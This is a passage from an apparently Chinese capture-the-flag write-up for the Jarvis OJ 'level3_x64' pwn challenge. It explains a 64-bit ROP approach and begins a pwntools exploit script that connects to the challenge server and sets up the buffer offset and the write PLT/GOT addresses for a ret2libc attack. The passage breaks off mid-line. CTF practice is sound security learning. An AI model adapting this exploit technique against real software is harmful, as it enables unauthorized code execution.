(Jarvis Oj)(Pwn) level3_x64
这题是level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下:
from pwn import *
#conn=process('./level3_x64')
conn=remote("pwn2.jarvisoj.com", "9883")
e=ELF('./level3_x64')
#libc=ELF('/usr/lib64/libc-2.26.so')
libc=ELF('./libc-2.19.so')
pad=0x80
vul_addr=0x4005e6
write_plt=e.symbols['write']
write_got=e.got['write